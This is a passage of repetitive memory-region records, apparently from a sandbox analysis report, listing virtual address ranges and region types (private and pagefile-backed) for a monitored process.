"private_0x0000000000610000" filename = "" Region: id = 3882 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 3883 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3884 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3885 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3886 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 3887 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 3888 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 3889 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 3890 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 3891 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 3892 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 3893 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 3894 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 3895 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 3896 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 3897 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 3898 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 3899 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 3900 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 3901 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 3902 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 3903 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 3904 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 3905 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 3906 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 3907 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 3908 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 3909 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 3910 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 3911 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 3912 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 3913 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 3914 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 3915 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 3916 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 3917 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 3918 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 3919 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 3920 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 3921 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 3922 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 3923 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 3924 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 3925 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 3926 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 3927 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 3928 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 3929 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 3930 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 3931 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 3932 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 3933 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 3934 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 3935 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 3936 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 3937 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 3938 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 3939 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3940 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3941 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3942 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3943 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3944 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3945 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3946 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3947 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3948 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3949 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3950 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3951 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3952 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3953 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3954 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3955 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3956 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3957 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3958 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 3959 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 3960 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 3961 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 3962 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 3963 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3964 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3965 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3966 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3967 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3968 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3969 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3970 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3971 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3972 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3973 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3974 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3975 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3976 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3977 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3978 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3979 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3980 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3981 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3982 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3983 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3984 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3985 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3986 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3987 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3988 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3989 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3990 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3991 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3992 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3993 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3994 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3995 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3996 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 3997 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 3998 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3999 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4000 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4001 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4002 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 4003 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 4004 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4005 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4006 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 4007 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 4008 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4009 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4010 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4011 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4012 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4013 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4014 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4015 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4016 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4017 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4018 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4019 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4020 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4021 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4022 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4023 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4024 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4025 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 4026 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 4027 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4028 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4029 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4030 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4031 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4032 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4033 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4034 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4035 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4036 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4037 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4038 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4039 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4040 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4041 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4042 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4043 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4044 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4045 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4046 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 4047 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 4048 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4049 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4050 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4051 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4052 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4053 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4054 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4055 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4056 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4057 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4058 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4059 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4060 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4061 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4062 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4063 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4064 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4065 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4066 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4067 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4068 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 